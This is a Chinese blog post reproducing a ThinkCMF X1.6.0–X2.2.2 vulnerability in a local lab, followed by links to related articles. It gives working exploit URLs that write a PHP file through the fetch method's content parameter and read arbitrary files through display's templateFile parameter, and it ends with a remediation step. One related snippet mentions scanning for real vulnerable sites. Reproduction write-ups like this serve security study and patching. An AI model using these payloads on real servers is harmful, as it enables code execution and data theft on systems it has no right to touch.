ThinkCMF框架任意文件包含 漏洞复现

最新推荐文章于 2024-04-11 10:59:48 发布
最新推荐文章于 2024-04-11 10:59:48 发布
阅读量996 收藏 3
点赞数 1
分类专栏: PHP 文章标签: php 安全漏洞
本文为博主原创文章,未经博主允许不得转载,否则追究法律责任。
本文链接:https://blog.csdn.net/yiqiushi4748/article/details/104892719
版权

0x01 简介

ThinkCMF是一款基于ThinkPHP+MYSQL开发的中文内容管理框架。ThinkCMF提出灵活的应用机制,框架自身提供基础的管理功能,而开发者可以根据自身的需求以应用的形式进行扩展。
但是由于代码漏洞,可以构造恶意url造成文件包含/上传漏洞。

0x02 漏洞版本

  • ThinkCMF X1.6.0
  • ThinkCMF X2.1.0
  • ThinkCMF X2.2.0
  • ThinkCMF X2.2.1
  • ThinkCMF X2.2.2

0x03 环境搭建

ThinkCMF X2.2.2 下载:https://github.com/SaltNego/much_tools

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

0x04 漏洞复现

  1. 通过fetch方法和content参数,控制写入内容在当前web目录写入php文件,造成代码执行
http://127.0.0.1/ThinkCMFX/?a=fetch&templateFile=public/index&prefix=''&content=<php>file_put_contents('196a4758191e42f7.php','<?php echo $showtime=date("Y-m-d H:i:s");phpinfo(); ?>')</php>

在这里插入图片描述
在这里插入图片描述

在这里插入图片描述

  1. 通过display方法和templateFile参数进行包含任意文件

http://127.0.0.1/ThinkCMFX/?a=display&templateFile=C:\WindowsUpdate.log
在这里插入图片描述

在这里插入图片描述

0x05 修复建议

将 HomebaseController.class.php 和 AdminbaseController.class.php 类中 display 和 fetch 函数的修饰符改为 protected

偷一个月亮
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
thinkcmf 上传视图文件管理
12-07
thinkcmf框架的插件. 原框架上传文件需要多次上传同一文件,占用资源. 插件解决当前用户的资源重复利用
ThinkCMF框架任意内容包含漏洞
qq_17754023的博客
02-28 2127
ThinkCMF简介 ThinkCMF是一款基于PHP+MYSQL开发的中文内容管理框架,底层采用ThinkPHP3.2.3构建。ThinkCMF提出灵活的应用机制,框架自身提供基础的管理功能,而开发者可以根据自身的需求以应用的形式进行扩展 每个应用都能独立的完成自己的任务,也可通过系统调用其他应用进行协同工作。在这种运行机制下,开发商场应用的用户无需关心开发SNS应用时是如何工作的,但他们之间又可通过系统本身进行协调,大大的降低了开发成本和沟通成本 漏洞介绍 远程攻击者在无需任何权限情况下,通过构造特定的
文件包含漏洞详解(超级详细)
最新发布
weixin_58849785的博客
04-11 1941
程序开发人员一般会把重复使用的函数写到单个文件中,需要使用某个函数时直接调用此文件,而无需再次编写,这种文件调用的过程一般被称为文件包含。服务器执行PHP文件时,可以通过包含函数加载另一个文件中的PHP代码,并且当PHP来执行,这会为开发者节省大量的时间。这意味着可以创建供所有网页引用的标准页眉或菜单文件。当页眉需要更新时,只更新一个包含文件就可以了,或者当您向网站添加一张新页面时,仅仅需要修改一下菜单文件。
ThinkCMF框架任意文件包含漏洞学习复现小记
Junior_Q的博客
10-10 1142
前言 跟随大佬学习,了解学习了ThinkCMF任意文件包含漏洞,并进行了一次渗透,下面来写个学习笔记记录一下 影响版本 ThinkCMF X1.6.0 ThinkCMF X2.1.0 ThinkCMF X2.2.0 ThinkCMF X2.2.1 ThinkCMF X2.2.2 漏洞危害 任何人在无需任何权限情况下,通过构造特定的请求包即可在远程服务器上执行任意代码。 实战 因为是学习,所以直接fofa语法搜索‘app=“ThinkCMF”’,虽然搜索出来很多,但找到一个确实有漏洞的还要花很长时间, 下面
thinkcmfx漏洞太大_ThinkCMFX任意文件包含漏洞(学习)
weixin_39967120的博客
12-22 292
前言:最近爆出来的漏洞,ThinkCmfX版本应该是通杀的,基于3.X Thinkphp开发的我们就拿这个payload来进行分析http://127.0.0.1/index.php?a=fetch&content=我们要知道tp框架的特性,可以通过这种形式的路由方式进行访问相应的功能点,例如通过g\m\a参数指定分组\控制器\方法我们可以跟进父类的fetch的方法中查看发现还调用了父类的...
ThinkCMF框架上的任意内容包含漏洞复现+分析
weixin_44897902的博客
11-16 771
thinkcmf任意内容包含漏洞
漏洞复现----ThinkCMF框架任意内容包含漏洞分析复现
wwl012345的博客
11-29 2774
0x00 简介 ThinkCMF是一款基于ThinkPHP+MySQL开发的中文内容管理框架。ThinkCMF提出灵活的应用机制,框架自身提供基础的管理功能,而开发者可以根据自身的需求以应用的形式进行扩展。每个应用都能独立的完成自己的任务,也可通过系统调用其他应用进行协同工作。 0x01 漏洞介绍 攻击者可利用此漏洞构造恶意的url,向服务器写入任意内容的文件,达到远程代码执行的目的。 0...
漏洞复现-thinkcmf-文件包含】vulfocus/thinkcmf-X1.6.0-X2.2.3
10-14 1469
【thinkcmf-文件包含】public函数
ueditor 漏洞 php_【组件攻击链】ThinkCMF 高危漏洞分析与利用
weixin_39641103的博客
11-21 672
ThinkCMF 高危漏洞分析与利用一、组件介绍1.1 基本信息ThinkCMF是一款基于PHP+MYSQL开发的中文内容管理框架。ThinkCMF提出灵活的应用机制,框架自身提供基础的管理功能,而开发者可以根据自身的需求以应用的形式进行扩展。每个应用都能独立的完成自己的任务,也可通过系统调用其他应用进行协同工作。在这种运行机制下,该系统的用户无需关心开发SNS应用是如何工作的,但他们之间又可通过...
ThinkCMF 任意文件包含漏洞复现
weixin_43740200的博客
11-15 854
这几天看到ThiknCMF存在任意文件包含漏洞,闲下来复现一下。 搭建环境,放到服务器上。 先来试试读取README文件 http://127.0.0.1/?a=display&templateFile=REMADE.md kn1feemmm,好使,再来读读系统文件 http://127.0.0.1/?a=display&templateFile=/etc/pa...
文件包含漏洞
2301_80661529的博客
03-07 1116
文件包含(File Inclusion)漏洞是一种常见的Web应用程序安全漏洞,它源于开发者在编写代码时,对用户可控的输入参数未进行充分的验证和过滤,使得攻击者能够通过输入恶意的文件路径,促使服务器加载并执行该路径下的文件。本地文件包含(Local File Inclusion, LFI):攻击者能够通过注入本地文件路径,读取或执行服务器本地文件。例如,攻击者可能利用此漏洞读取服务器的配置文件,获取敏感信息,或者包含并执行恶意脚本,如Webshell,从而控制服务器。php
ThinkCMF 任意内容包含getshell漏洞
10-26
ThinkCMF 任意内容包含getshell漏洞
ThinkCmf文件包含漏洞fetch函数-过宝塔防火墙Poc1
08-03
主要我这不太会调试就 notepad++ 分析吧fetch 模板漏洞分析流程框架加载上忽略调链* 获取输出内容* 调内置的模板引擎fetch法,* 默认为空 由
ThinkCMF内容管理框架- ThinkPHP框架
04-16
ThinkCMF提出灵活的应用机制,框架自身提供基础的管理功能,而开发者可以根据自身的需求以应用的形式进行扩展。每个应用都能独立的完成自己的任务,也可通过系统调用其他应用进行协同工作。在这种运行机制下,开发...
ThinkCMF介绍和漏洞初探
soldi_er的博客
05-28 1361
##内容管理框架thinkcmf   ThinkCMF是基于ThinkPHP的内容管理框架。首次遇到,是第一次参加学校awd攻防赛。下载比赛中的Web源码,探索ThinkCMF内容管理框架。 信息 说明 概要 开源国产,中文建站系统CMS 开发语言 PHP Javascript,HTML/CSS 操作系统 跨平台 官网地址 https://www.thinkcmf.com/ 特点 支持Swoole 版本 截至2021年5月,最新版本:5.1.7 & 6.0.1
Think CMF X任意内容包含漏洞分析复现
Azjj
05-22 478
Think CMF X任意内容包含漏洞分析复现 0x00 简介 ThinkCMF是一款基于PHP+MYSQL开发的中文内容管理框架,底层采用ThinkPHP3.2.3构建。 ThinkCMF提出灵活的应用机制,框架自身提供基础的管理功能,而开发者可以根据自身的需求以应用的形式进行扩展。 每个应用都能独立的完成自己的任务,也可通过系统调用其他应用进行协同工作。在这种运行机制下,开发商场应用的用户无需关心开发SNS应用时如何工作的,但他们之间又可通过系统本身进行协调,大大的降低了开发成本和沟通成本。 0x01漏
thinkCMF 文件包含漏洞
Hacker_by_V的博客
09-09 1594
thinkCMF 文件包含漏洞 昨天给大家复现了tomcat CVE-2020-1938漏洞,那今天咱们一起再来看看,最为经典的thinkCMF文件包含漏洞。 ​ 首先我们在去介绍这个漏洞之前,我们需要先了解一下这个漏洞thinkCMF。 thinkCMF它是一个开源的,支持swoole的开源内容管理框架,让web开发更快,节约时间,这个框架的话是基于thinkphp的二次开发框架,所以说在我们国内还是有大部分的网站使用到这样的一个框架的。 那么我们可以想象一下如果这个框架出现了一个漏洞,那它的影响范围是
php任意文件引入漏洞,PHP:ThinkCMFX任意文件包含漏洞
weixin_31230841的博客
04-11 248
前言:最近爆出来的漏洞,ThinkCmfX版本应该是通杀的,基于3.X Thinkphp开发的代码下载地址:https://gitee.com/thinkcmf/ThinkCMFX/releases我们就拿这个payload来进行分析http://127.0.0.1/index.php?a=fetch&content=我们要知道tp框架的特性,可以通过这种形式的路由方式进行访问相应的功能点...
thinkcmf 文件上传
11-18
以下是使用thinkcmf框架进行文件上传的步骤: 1.在需要上传文件的表单中添加一个文件上传域,例如: ```html <form action="/upload" method="post" enctype="multipart/form-data"> <input type="file" name="file"> <input type="submit" value="上传"> </form> ``` 2.在控制器中处理上传的文件,例如: ```php public function upload() { $file = request()->file('file'); $info = $file->validate(['size'=>1024*1024*10,'ext'=>'jpg,png,gif'])->move(ROOT_PATH . 'public' . DS . 'uploads'); if($info){ // 文件上传成功,返回文件路径 return $info->getSaveName(); }else{ // 文件上传失败,返回错误信息 return $file->getError(); } } ``` 3.在路由中定义上传文件的路由,例如: ```php Route::post('/upload', 'Index/upload'); ``` 4.在浏览器中访问上传文件的表单,选择需要上传的文件并提交表单,上传成功后会返回文件路径或者错误信息。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值